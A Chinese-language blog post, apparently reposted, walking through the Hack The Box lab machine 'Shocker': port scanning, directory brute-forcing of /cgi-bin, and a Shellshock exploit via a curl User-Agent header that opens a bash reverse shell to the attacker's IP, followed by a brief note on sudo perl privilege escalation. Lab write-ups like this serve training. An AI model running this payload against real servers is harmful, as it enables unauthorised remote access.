首页 > 其他 > 详细

Hack The Box::Shocker

时间:2020-12-26 20:28:57      阅读:46      评论:0      收藏:0      [点我收藏+]

0x00 信息收集

nmap -Pn -sV -T 4 10.10.10.56
技术分享图片

浏览器访问80端口查看相关信息
技术分享图片

查看网页源码未发现敏感信息,尝试爆破路径
dirb http://10.10.10.56
技术分享图片

继续尝试对/cgi-bin目录进行爆破,最终得到/user.sh
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.56/cgi-bin/FUZZ.sh
技术分享图片

访问文件,下载后得到如下信息
技术分享图片

0x01 漏洞利用

通过google搜索cgi-bin和shell相关的内容,最终确定利用点为shellchock
参考内容:https://en.wikipedia.org/wiki/Shellshock_(software_bug)
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c ‘bash -i >& /dev/tcp/10.10.14.3/4444 0>&1‘" http://10.10.10.56/cgi-bin/user.sh
技术分享图片
技术分享图片

0x02 权限提升

通过sudo -l发现可以通过perl提升到root权限
技术分享图片
技术分享图片

Hack The Box::Shocker

原文:https://www.cnblogs.com/aya82/p/14193755.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!